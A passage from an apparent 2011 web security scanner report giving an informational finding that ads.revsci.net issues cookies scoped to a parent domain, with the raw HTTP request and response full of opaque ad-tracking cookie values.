Set-Cookie: rsi_us_1000000="pUMV4y+jOBYULQEE166YFQ6DmFfDqOqv5R26co+k4LEEzVkoRrop8y5ZQYFpxPJjE5QxDQ+XEMEfjZitbQaI0OEcBlgm3HbVBapZBUj4gebsoESY1gQB4r5K9z/LbiN+Yckov9ICfghisfVIqvqy/On8Ei0lvf8hzbkmU4m+SI32a4ytiDf3yl/4bMAhB9O71/oNYrYPnNoN8e7HT/bQsHiapEXfW4FGP5SDBz/WMK8qt+HrvFkkILMltGi/KhPZvMYpSNMRCXer+0XoQe0vjN5e2yzsORfl/C2VuuSzoI1te3hcaQrtt1CpNqLOGy6Tduv90yVOuuyk6pvs7EySgEIm48o9iklXltCb9za/GnRk4zy39xByfOshbqnZZm8zU97WhojHzdzjrRSYuKYaNaY/fhOZ/2YOUfTaG9ZnfRJ0QaA0FGoTNaHFDsfz7e2qYlKU5tVSvnHLU9+PJZHgvtLWdTrly7qN6BkH8lUf73fnrVMvyBVqij6fKKFcjil2V+KxJNzFiqhmI49Guihwq0V+LbkkHdckgzgyfylLNbdI9B6/XUYOB4wTNHU1IHl+WxOrS0Aa0Ikbu1wE9zuu+mGK3XF5rLQ5FSoo3Gyw0ljuxKt3lEUylLa8b4kE2aFiz+mCXvyVAJw8ySz5ps0PE2yC0kCH91/GzXp89h7+7AAqeZchiZg/og9Bv4Hmw/jGVPDR1/zN3aH0zWSAEz2kKnnwIVSDClrIjB7xT/VhzNuxv63WFmrJ3ZJSPRuGRQVdggZWwCtkTwdnH8GRyXFnx9GkYS8TTen3H661spcy7DpahRVmp5lXdgxhnE33yfW4sQKHTAb3c5epjGaj6U0gUFED0E19Pn0xpixcyO8CGSy6hhBCeCLF1Dx+ls9t9DFI0NVEj8uX41XKLBjTpILO5zlE3W49qXKKM1Oor9IKD5xhfspnJnKs6c/+9PebY2bUA/jSBu+Ztpb9VQsKx0YxvKTzA6puaEQucj3RjMaIez7OtZGHjz3neEG0idQEYfpym6ypCSkvCvg8ONhccwq6prbTtPEPXdrJUYxshgKjywWk/peVnjMU/jBSkwu4EurjmHloS0+M+8Sl1WdeJWM+IioB3kwKUUbNJtOCjLH9ch1E4XCjXNtWME7WHRmRL8oA1NR1XqKUmjzBzgawSq59nlSoBBAiLcd8C3MrpOVX2tf/Ljyk7kzMFSIb/gaas31hfdOY0y6FHTCeFh5PtNJBFoagjoC9/N0dx5yZAnjocXexh+h3z7kcP7XHApMRxd1XYAOvCnwgnSHHag5xCgMt1QYgrKmmwesxNAcPluGEKvHibMmsKnsbmooKkRiFaGIscYNs0O3XvMfq2aCe4qa9NYgcUiT4bi7OVSsT1v8r7RmHK+9/BJrxt4QekRalP4p9fyj6EhHfJmyaaeMh7rHN8L45tnMVPk+rkW2c/ayzrWRzy7xPzvi6Nw9w7Kcb0sxcEKIPiVdUbZNyd82b5D6P2tkPlgX3UMdI06BUaGrEdT1JmHbOAk2OfUcX8hU1JmXffWSz1kg9zmXCL5tCgZlfRy0YD6TrIGns0lcy2+c3WlAvuIswT+0qfAnNjqOaXAHRL+cSkk8KWXSwoI6KAgzkOupp+isEbiubcFeysr4jS92TZroAY9PsaBjog3y7CYBr/55Fqy80O8h8UljjWeBVz2KDTZVMMmVwspszcpxbRogYGFVjL/+d7uMGcEYjL7HNTs70qLF5x3gdWdVLOCfamEiYNZj1Quri2A0MZVr0r1zcOTh3xI3Wza5LOBi5mI0Og8bsVGiCBxzJfEw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:03:55 GMT

GIF89a.............!.......,...........D..;

13.17. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_e91p="MLsXrrEOpxpv55C28tahZ2a57v6B9Bu9Y8OavLvXmNxWuZvP+AaSaAp+hCNi+AtwyjQq0FGvdh22EkMWeQ9fGdEUI3HmvYpj5SgWK/o8cPKd8tOuEYJL0wlkfqzlMraspaCjv4UWwC4Z+x1eEABecffWNgSWE4KnGcXxROUtwq+YkQ+ROJeSLZa64yaZq55nTns5r2mZkplqIZumEiheUMs5slvBXG9TDF4tqMsPj0dqmdcss/G1eCVOUn1kH/1pans4mGDFVBfL5LYH5naxSrQiAxQLIWBQEyel6a05pjv5OKG9gWRvbsprd8pte1GF0b/98upmtGe5+T8rl7M/aBeOhlVkn8U3BODWfJ5FjKLQ6+SM2Tql5LU0udnBQGDTksgMhpTK/qD4jDVsHhTVoKEiN2xMdNCQCd/0b+L3bBkU2keS+AnYoKkQXitLohs94CqrR2ic7gZtTC9/a4B9DmKE4dqTbcCDXjyu9q7OQ5IB0sPtUik5YDyOv0GOqbcr4C5W0WY3j61x1Fu8SczRrDGnC8mOoCcyxXldULtPjLgxm+kbmxt1WGpJcYK6DwbA9EwEJdq3ynG01XoLZujzgmq8VNM4pRuymWGMOSxMheDOLa7CHyqzSsRDFd8jK6+oXgQ8tR2Kzvet9TihmfalZ0QUeSwQxgko/JGFC3tZWrdushgVo/RPztPl2qZwoXOjMfEegk9NGFrafOuWCApavQXJY/f7mq8UVDViXiubtMeqFsOziKPyOWG3zl4LWECNuYTh6QV/lfznDtAlVqSQLVCxhO0yx+F56HDso4xVdfo8rsikqcuEQQyQq34tIIoXZIuf5lCr+T8fmJnJPm511jrxjq0YjKAVbynso8dLaXxSzg+RRH+7DBBevYGlsTN9fnks2O+R4Rll8rnPB55zQVyCy7AdTYgUmrOpyEUXvd+ee0UDzLbXEmv5Fdo4Zby7ab6iaGcPz+Ic6q/5ATi+5Jl1v9cbuJwlhNyrFs6PLxaNCjsCwK8fBou2iWX3XiyjXLJIDZrRn7k3KssmXbuouSaJj5MmLEtuTqpQEfmDaW8tPXGLnkuSodpzsa52hV/J/4tYYyVYa+6oQduqrX2mAnx5Ngj3hiSlg7Kc19WJejD9gNPJWL5drJWyrlT9qztxiaosdVzngLULjeXdvuPfxbNhWQt/RUrTWqJvSrOJXaTlMkRYOMNJyLWagCPN3Bg8aqJHVDgLKn1Bl1+y/ng2hDrOa9kLIGn1TSFXM9w3MbY7RJAZEAkzMewYAQuPGB6Jlz3l1PibztByiunECDF6Xn3UVzWUhAUDilaestchXm/fUiJySFBUvKz4ROh8uRnWzV61zfCMnblteUeVIn+CxkHyEB07JYVb9/YU4o+60Zdlc3PZ3A=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMV4ymjOBYY7dXiYRm+XFX5ofJL+XaDC1GrYq+k4LFA7AqIB3dIqs9Sd2ioTUrqF1R0wWmoU9fJlXau7UsOfVkSJLrvRn9MkFEuSlV/pIwfQcjJurrbgDRlCAhEEGgwcWiqZPBhtxL5iYQN8iKHduWI0WlUEJSZZkPBbV75bCDyjKs3Zjsl9SHtBD3AIbF+JCELUguXthiXlrjKwxn+O2WiMr6gj//AspzgtNnYh/V97ghHKaWR+4p6Ok1kJPfpk4DKtBpHsYMqDZ8fSeVxjfPuMkPs1z6bZqzYuMAvI3BewyRJN8GzTmwHIN2kue/7KUIL1oHMKwDD8ltQo5p7VskyyjwwN9Yij1tyET3VGXjLEjI/nAzTRnRebb1szJ0uCHw4zWluYO5jx8H6EiqKmsl9XgOYOwqaxXd0n/SZKkequEUP+X64sA1YF6Y63Ko5Gf74STXoU8IQzWXINOz2oaVAxi2E6cbXd1xfE8ZGaeNwP0/G4ooQ6+9zBM+zRHv99tL8VYrniDlsnAUHFv3YI7oy0EJA+ppEVslPiA8T8hk9z58JfbLt3583r/oh0CUiTeEJwImw2bXKSKOKmbzBfEWDfbFVR+urml7h3h0sHU1ajQhdpWcafyj6OjqPMO7rL09Er+c6X82RWehe3KxOzTcX6iaSOGb46BCxT89wS0PyQCHK6Wivu+f1KlNTkQULMjwPI7zPfTmVsMvRWhRa81ywmJYO1UbcmcMbcXpjP5hcZHNiEvCaLn49VgjYrqaAEirB5mUgEKQXyFZKbK6Xib5KU4rwj9XNIFEdZcqKXQ1oAD50N1jBDuRIftWDOz+Q1MBwu9O3bCFKJSMUBpyuDpU8w+KkZpB/DUhXKNMx4Gc8CuakVgynlAFnVBjJG30x4tvmp+JXAHZPi7eIZEP/51nUmy69Z9B/5U3xxiL2Zty/ZFM6lvv9Kt6179IEre0BmsU98AFtNwX/P/aDloGEiFXSA/hjDrntaLGbdQUkMjs9A6KCH29VwTxv/EtKW2Bh8w7j/ClSeN2cO6T6YsYLo7qhi4Ud9PCVpPJEx1G6JfMWteSnQsd7QyhwS91ppg85wlSvHdgj5Rte+VtJmYfNsO3UBtO2TV5wnbdk5QzgEG0vkLbLY7JvIVBQO4tuMXW1MS6iI1ojHkPINvyxoG2b5NNGprWR7+CS+/MopOVRNjOkQPBs6uV7nofHrdbbAlQjobTeurCqZ8AcdF9T+AfaBpZwMsqCDghxge5OUtGAMwKfwpKxqTP6P5anh6y4Hm7/MY3N9ijWkIiPe1Gtbg/rmoVgRe9YQRIU06+vqkZ6bp2/EovzBD4bGgVofLnR1ikmeLTwW5MCP87mXfWEMueQuIC+M/VIBAXmG2NjHUQIsVfgGUZFStjaImVmNPog399Ta4fiUJnYZdom7yhsR4OI2SyjH8JN2DycqtZ6KLTOz9IG3GPtxi8Sw+svFJy2Fz6AW0DOsk4N3bGmcP73WwE3d6XNMgr7Otm/76nd02bz6P0rXo2GYxn1hC2DMTpLhNbmWJ25jCFDqxtZJu8NqeNJisK8IZZ5XoV+UL9KijMAKjDh1Qcfi+fa3BEv5h2gbLgAdb9mbO22jSVbwVE4RolUufRnhMwWtwHaKayK6t/hsMK9orgjgWhSOegvrBoUu6h7Ym91/g4JyZEuHU8gtb922aohYq1ZGxBYvFdnyKoLoCmyLUgPj1CeUz7itsWeintRACO+n8D1mOeHqFataRuQbaQsL6GdVpf3Npp0ohbzOELmr89F01YACOkONCJm2bsHgZzWB/9ErNJu/nYRYw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=K05539 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="MLsXrrEOpxpv55DW8tahZ2a57v6B9MeZL8/LTEv/jJaMn5vP+AaSaAp+hCNi+AtwkjW+RefXIKCFOb52VlJjrhtz/K0F0sWwzeRtpIdluxQek5zccFWsHLi2KM+ZjwDQCJV6O2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP6S0vV0rRPMr+4FQiZzVfCjm2Lh/YkpRiZOeLmjUput9lWGJP3YqjHBlGcOU6aAjfq4ibjAuZaifAD12GV3MM7Os90125jNjah5Wl2JWXp3qoPuhHB9AUM9SIgkXkhFkXawqpm+PCmBL/rRLkNvRLqXizj1nhBAYelUSwkeFm7FWTh3bAW46hLZnvrDEVxxdlStZX6BLgYWkTXAr7NhngfM63uGRFwshyT0vUcCHgJHtHjwqb4gUK3U3Xlk/qfEyRIX0CYp3yLh6JdWmKGvTop06tZ57NWC7sYJivG6/XJXPh9kiLGmrABOJg0ZtLzzv+RMLBnPdhWdsfqH1YJwZA8zu9RM24LtkIq/AzoH015WS8axndbNjVCS0Jdy2g7tnbT4ibdPnWCemmw5DLKt17XfJqmkiLo4HNRYEQTYElhU3p/R3QmwWF2NkS16R2OV/GC10lX1vNK73Ft5xFtY5cXx7HXqH4NDid4ya00d1KxDbeGs2zvRtLTQCJxhQMPTkN34kd77C6G35LeJs2UWyjbLbkj1s/WgXM/d2WrgMkJc95WcpztNpB3veCMTXHtRpRP9j79S2eDr/UTmxj81QK+a4V5co3htv2qle9Hfxbq0j9sdrznUKUWJ5WYe1DlAdBsYmSOhPpIiQM0NaLNkyRwyAYAqCh7y5c4nZ6Tpo0r6KsvGwNO/t8O1yT6/GShgeyHXi1IvvZ0hstn43x+lxdVmaPuYX2sSMnPn4QKa12/fY0tPU6ddfwTD+9bgfDbO13IsHs6f5j2+r+EtZari1WX6nbA7T++lDvkLjcIrOl4601kWzvvi98b2F7OSSGvaJpJGavbpF/2BIRW/HC0h5tpMEm6W7+erhn93u1cBSkOvDoCr0GepDjUWA/1yQzlErEbvPIyhM3f4Jzt8JEyA2ePwz5BrQAUT9/dLtw8tewKVOKqP/qq9iEZ0wmdXyjf/AVeIc8f2yvlCzvSY+nfgoZk3nuvpBn+TM//Se4rR/DBpuCUDXQuA7A6XXEa7vK0oRNNNeyJKHti3Q1fiLowLkcct3KanqtvmCIU6n0kuFI6nT1Ahq/vOxwTNJbEJOQVxP2vHai7ZVs1Qa6BwHlMkcXR6E6DXWn7nbH651+v741MwSOh0TCFMQTTNGUekw4gX6f9HtRzUy5C/ACJ4xJ7a+tKlQGoDR42VY9foLr0PtTN/oCK3ykMmboo7thtABUtmg"; rsi_us_1000000="pUMV4ymjOCYULQEE166YFQ6DmFfDqOqv5R0Sep/xDdMQzQnGPlweaJXw308lcxsF58vOxVNcs8R89Us/bQw/0uEcBlgm3HbVBaqZciMXxA7ZQVsQNiAf++dJGYq1/xNl73YlZqAJtiAniZK+6WJ9mDbp1ivhzL5nEis7wXnPalOc+X8R2RVg+y8UNaZy5ZOc+H8kd4SG3Oo03tz7/dw18dKTWdxukwoaubmDFQHTMm4sRKbDfKN48UPoYMTs6BX1A4LF46V440ElFpoeJitf2h/pLwbuK0ljGz39v62Sma+Zo73lcvqhSmbjkU1Q6kZQoclEYeUyfIqfQY3sCsUUa8Sy9z7ZcgnF1atSKLPhTXaf6OoqzQEfeQWe3wpIUGn2GHtXLVGm45mmFmqunA7jZO2aHzuLCTp28NqBu8kCH+xHOE6jb7/4z7ZPkQJ+u/D+sZL25ZZoIAnJ4uU+LqTXIUpslqyUB5oWsUbJLKSoK89sf5wC46cWKHLCUCUx7V+Vn5AoBfDmY0qerCSkq63sxMnKVc7Y2mLTInWjV/ewZU9UjHPMkHGBtTX8t75ArQil/Na2GRTFUr5fhdfgzx5oueUv1FPRvGVMAAqoGtR13qVB/Vg2keSh/FCyLjGc7uE/9s+WRiFezbsVZeCcC+d9Eb880BuvdonWkyFfw1avjO6jM5wSjPV0ATxo8i0yFWFbNJIhhHcqIHXKggZNdINPohBJjEC1kJGLwFSXfTmEkpyH3TofsHIdXiJBg8muA/Jaj3c2fgkIteiYcB2Gz4Wn7j5HgmfS2ecJe+Trq7ITr9gPIZRpsJSIaO3EOUuYIwjyNdvXn8MfyMoxNDKjRes+Q8bR2sJdjoX8lZOkDh5J3PsAg0ikelhbA+xEPpzCrSjQCR2VevyKfKb/K0DBlXBwCdBzJqyGXNGQSDeXGHOCnhhj57KZMNSbLbSuOz5S21Yml1cbecDFyQsykG1JkFEr1ZDlBPWhf0lFBV6XAFRVrJ/a/JXiiBb4Eeg0AJ8vdp9Ilk5Na13QOPb71fp0boUamxNQpFz2NH9rpR1TOzhJz32LBycYZQry+MdshyoyJQ15G5TxeWDaczW4lSsMVYpvvQzqS8vRkGLOgMshXUu2E+a6xgsVGc11kHB8/aLJkwXFkcx4BF0L4s4ICThTh7CcKzozKJmM4LzFXXaINqTogC3wV5sXvBwSQfSVUd9lpwd9bs34Cb1OEjgd7rqkmnwwqP5uXurOGd8EYTeaGuv/qZPb8bTTalHpXy+PkGYZX13lAxeMItepWLPcaLLBpAYBKZ/Ihq1fKdq4TQe38T7YgQh+wnvRH1fjYGJmt5DWwZOw3wbIad2fJZShuZWCNnyIB6KCbPN4G/KTzUNy5kVqO+pBsdZW05zyp5FIuP0vYNGbMBkdNgMWUed6K/hEUdmSGEyP19JTJtDeHAag63fQkEjJ6twXzWTr1I7NaNzc+vCaGz5HPRVZafnlO/ulNenk6eGxbU9msVlICW6Fsoac7neLMtXq3KnjAoQSzlc37GR17Uli9FXO/9DpV+1KMKVSzhTj7dEU13glsLz96Zewco5QSNCjx3VKQ82gqES+uLicq8VrbcQZ8bZUFsiEyYTxlZ+fS6/EYnLjJ9Bk6LAgUDFoLFqGEFdxm9qf31Gqq6yE+3FP0sXUhv9CTG9Qao3c6D69SN73qQ3I+LREv/fxXOnYd5NAs+zwVcmF/PHUAgKmZMsxjhKOlt4kOsS+FetbxfaCgkZcpZ4P36eyny+I4yUu0lDINI8+eBDvAUCY3h2n89Pz1nhuWK7Q534Q7w=="; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9CEJZjpv597JwPKJxL5jdQTtJkLnfaGGH+sXeVhojk3TDdGQ48R7+bLruJ60iM7Sz5oU/MMtfVAK48Z9O6/45hHhobh/P4HBsmPoU0h5SlodRsokYWrKBhXeWhEMhpYHEPoL0KzP3EX6mZFBv9S2dirOe+Qyy4gATViu1piG4YZ7h8IYuIBweBMVCqaoaapFLQFyXwt86CZwNS/ZI2FWdSU9tZKJgdmJaVdwKcPVH+omeRzslVmcpIreii62y4609e4ruTWt7AE2biclRlljz/XkBWKA5jAg4YmqVGcKbaF6Cu6lYgxzS61ATCc+TsSYHbQaQ1b9Bs+h1g+JnvqhPRhpQ9X0T4UILyoAQ6qaTcW0y75ATMgFgVPblB4OEOs+Rn07APBf2ZHZpTJZjCRQRFadCPUUZff9Ww751+pCXbMqzxH3RYaKszrGmw6Bl4Ct/tulPpzHRX4tck+fTAi/ALopOv5wo121Ej5NzCSn35BLQTnG8v/Hkb5rho3dE4bfKB0F8OojW/LLW25gMvqy8pCPUDiUjjwIVd2JfYKiCMGfqd4xuDm3SoXlXWi3Dlgd95+TvfwAHEbVpqzZ2dJOiGbI53uuikyLW71k0ngzB8AZvzytlxan3LWtI9KLsDEIHcprGI0mdY9SUpHT5bxx++8lE5XeRgy9PKl9oYPzV18TxOcagKS3NSOdNBPwaVlx86cak5s8ds1TjvFzExJ467/tlD1ty+ys++umu5ueP6HM12z2u8KSGE9dfflBj7aCHSyO4HcghXXbNjSygKXMBMX0o5gvyaduUNMSFm1YsynfDZLjWdWG6z8xfF9KvtuoIvfyR8ivzFlHL9O/BlcJpaAUdmqA4/keMlEDeuVWtb5stFbBI5DkQgFHhtP2M+g3pxqzPHlouWGOpx2YtocD29it3JFGBItEFfDxTvrDHQvroo0ida71OC1NcxQC9OQy/XOqEJSX8RxfPeouAjoyMqhm9iYIDCK9zu/9sqzwwrgQyOWvphqvVlaowQsS7wrMADeCqdUu6+NVgO9o9XKjPMGkhgPuPIa/yihqHah+SKlO/XvClQX5MMYfZ7FRKgw6q/CP1dHLbkstqhnDmd5GVppLaNZ8l96XbeFJYXTEUzZ7A05Gh0cWCt8hXDSQ6tG2T4FA6XpVxk9n7+CCGxEPjIBFxv6Zxo5lwBeBFo7a4W2T7sLx6MvsoljB9f4Ar+LT5IKhnteI1KOCoUTmoniPnKp7BUuAMUbZ71SX7LSYEEFII4BVWgijlPQbImy3ASlt5J6Guc//o0z9oaUJT/Uh5seuNBfBl06kSXLHwN/KiYSeCNpTNy0V8sIsafkXxKnd3DSC5+SZuwyeo8wN2ZOuOHPrI62KZ7vjIfFSAYKp+cwFzUbH+KvmJ2e7kzJTI1DnL8JUMCe/MMrjdE/2Iyf6TJWMi7AnjiVPx/vbvRAW4RDo3AKJE999kwYcaRciNrO/ANzPdafxGI8WPRFgVCDLgX1vPcai; rsi_segs_1000000=pUPF4jOheXIMH/C100a+jhiBrgB3gbbjanZUIGYQvsJbus0+tNf44z5qNncjloepKzH9jefVjYFD+mT/V/BZW0ePmQC8fee9Ci5xgYQgYvHsE4IHEeAgbZFE1zRWP0qZ+0GzhSbnF7Ghf87lh72NGCQePZ6NXOvHaqOResmRV6gVKFgeZmB4HLRd7Oo3uoR0qc93ZbK0/n2S4I/urBbaQrvJIhKBxmVZgUxkZilQO/7gU0IRvJ226yFLJaG0mQvu68iiB6/zfl+HqjS4iFzRVOLRfFaA11IXW/ngC18rkdPB9AFWQLqt3HsDJb+0pd78ErhUe/bczOV+sa8oNJm0MyiBz9E8b5x4r+aZzxfuQ1sOzg35InohP9lD0Xu8Md1u3ymPGk6bXUrYysHED7eWuB4KJDicWgTeLeAk1hu4u7OLrthqOV2c/JtMcTP8KJv3cIneFx3XcsJqvAv4sJ2XYsc9zYD8nBRhqZxYUKzbIMIykQ+RSFG3dwjjgAzMxo8OQmDf5S33LoUgCyH+8XaqjHG0ZEh0vlu8Aok3RdizoowVEqcKHGsYecVDzQFB9jDqa1ZDI5kjpB1IaHwKfnZxmz0gTyKSgZ8F7m6zxJNB8Ocuu2kqQbolQiY2d9DbulV3rQ3iBxKVCA6jFcJnBsNC1Jx850gnYGRUWDu1l9i5uYumsNua4QDLrq39CbEmQe2PiraUIeqAcxcPR1gDZUJtrZsb98wkbYVWNkRWwNrLFoAM16cFCayjUVdUmlFDIEEiPbYv5wyuZN6UKrw2FL2hpD0NVBpQVdoPnuzCwlt8iWnyKU0=; rtc_8mNC=MLvv+TMxZohq566eiyy8UbOz7zLy9mEQ8mXXGp+M0638wei+ulFK2S4Ev1MTpaDGwTDIzNSh73JhXWRrYe1q8VFI53sIxqXkW/IR8MP3tnhAKaxznh1qqAFm9HLpO7XrTCrWfZ7+P4ufmoW4lRhHEfZu71OIxcL5YJJvrGkqhNCjPWRlTPOiRjvha0je7Yv2ELCfsKqyea0kvlLmVs4Gm8JJzeVQl4IXkW57m8EzR7FsUTPxi+SDd3u2Xiub4x8QUpa02LwDN3qxBQIq1WCesHIc7ByqJtwqjLeJbob/d7fF1rxeUX6+J0FxvkWt3S2HX4pVLAyYOXqyShqsDGxKmgkrVrR3KL1vBgg3ZtBo6BDaqhpxsg6iIpBayhw1F9LzFHRr2sNjo0u3wgmpdvMOYcw9nMaWzZblmDKi23FJ0t5L/IYs9Ju+/N56Yijka3ZC7HUl3mtG7gohUcu61kuBr+80+Jmcd+2802K8Up206PnO2YdEs9lcKNoNfhgpiqT5YFmO9tDjHYpGIYY0JfBPYJYIcQUqi80mCJwAX/AnETMa3gqq0944/Zyo8YauyXnDEoHQQvgO+8O4V6WazD//pQiYoAJ/8l7qyjkDeKTsShTH3I9Rehl2RkHzFirjfVrW4lQUXp2KWdxsgVy2BCROadT9lGgUx0M54OYCsEeaedEx+LzgaggRdIcPblJOKwE5GFSMUtBpdwj1Rx3xljIXwR0c2g7tACuaNypu9CPBBxISp28Gxe2ppTT66sBRJOLWUUJd8r3zyVatHKaH7mqZQt8TIAXJTO9/boH2u+uTo7trHXN2KVXe+YxnwTqLGP1zWmsfDXgQF7t9OrY+RakN9Eq6D1NpBp7+EPUln5PF7OpqjyiN8sqguQAl5AwqGkroJssbei3CPu6qYVuROT9nZyY54sA5ktejSif6rxdQ5ymbdxvkE1CKisgwxg4BEbV07n84PmtFmgEX/In1zqD2x8d2dFM3WEG5yKuL86doNwXXA5WEcyXKyKpoS0UVtWbrn+MvawF70fCG9AUipHUXln41mbU2oXAlZnRhqTrFjhE1/ExnYnim9A7fvQcajJOaYmI58tTK5XHVX/QWmxutKJ8hE/WOF33xDUxwWqdptu9z6yb3W7aVDdBpA5kR1dw5uXeHD6KLzlmgRvv7kJ/8x+PTeY9adNaTUpRR/43yM20MyumzLkUfD9YuSRmAj3PdOubkzZZzECpSvBSbUeqzawKF64FmkaeReDZHhFeP3SKeuXFh81JxqoWW+olmwZtA5uvTqZjQhqCfS3AJDQHrzfQs3Gq8wUpErHk81OqC2eT9jZoJhYFWYffEcbMeoR9GGK+P/FYLFu24OxSLF5wg4Pqd7fze+pb5fhRFvs43/MObYLeZCsIUpeze4cemAHldrJWsMOYvwEdSqpWfT/hA6m43b0eXW/vKimOHYubf1s+KCoEyAvAwyhSsg1UMD/n5ECix5cbAH/NEPLNZOWsTpe/MVBm9nctcjD2hVohM+GYixMoXqsGBM/1KCAgr/1it8u4GXDySZ4iCPhsfI4yE4ykXOqOFqQHVmbwnxigVtawrctGF/ao7PBvQOcDF50ci17wGLIfUg3mIOo/nmDFUgoSpSuZi3k2ZjYWH25Kd9QzMs8J9llw75k3t0CU22892LqOvzU3pZn+I0TOzlQvAA0zsUuJoDY0A0uNLTYKY3aTFBLLgozQJ3FUGKMufPPhr3QvKkGJxFO2+dN4lcZWUb4RE+Ml5C6V3ODobqGPFp0GK9rFdeZ+htPirJWYArf9qUjtmaGvIEK5ftWRpWbtBZKzJTiPDN+rIcmf0swYyn1smmjpufzTdk70hXVOIPh/kIhRJdfzX/5fYNtSBE4Chwb+9FAvAsw7WUj7aS5sW3r6FANvBiTP/oIXCup2NyhX3a1Pvxs1pKCXY2CiGVCPWbXqudqNuzt6MpJTsJp1n0d+DZ0MpwmvhVDx57wZlc7uo/Oe9lFAkn94hVQDyLSpwEZPHueQXeurMfljA4tjISf+rYYWhGy/3H6ruqhpDTMpAIsLbFo74mcpXZdZAiIOBsExaf3w/UqsLKnEEfBAOdkszkCRjXWVkYMZo6IHARG40ewXnt8cJSKVE3oOip9agCbzmrtPWOaReve5aLG0lr9OIcf3aDk+Hnszhvg8r03gL5I8w+RtVXu2UZuA3YM8WiVKIU6wfKPy51+OVe7Q95dGFrMRh970/GxOTFSufw2PPC5Vvob3p1XdqBbTtlrW5IKTmd3qT9h+WP9SSEU2l2DTlFKn3+kMTCFh8f6TiGIAK4Spf6r90UBW6aqe+Fc8PRIh8p9MWTbZxccP6FPLZm6AfufZAieLeK1vs+kLVZhNB4jEfS2Q6dled0HJ1NrJo8sIE4isvuN63h88PMtD3DVDcqGxBmekM1gy6hAmHOSRDLm3e2yvxWyEFndBFHrZ4nxfAfUOJUVorP9XNxf2EBxM6AACQsUo9I5pJGKlOlK2WxrT6/xAzh8kz9+RgqqzAQmVz1TC3Oyk9tkJt3hfnF3VB9uCCL2GykG1f54ym9QYt5DrrMj3aGv35x0el5tK4c7oA4h4EVzB78hK5TIjOW1YkHftg4PGC3QZ5YgRKg5vBHzIDbipGgiNe788gpZfyXQ4FHeSRd0vaAH3PWMcKW7goiiPN91n/rZUWmy+ek8I+

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_UVQe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UVQe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
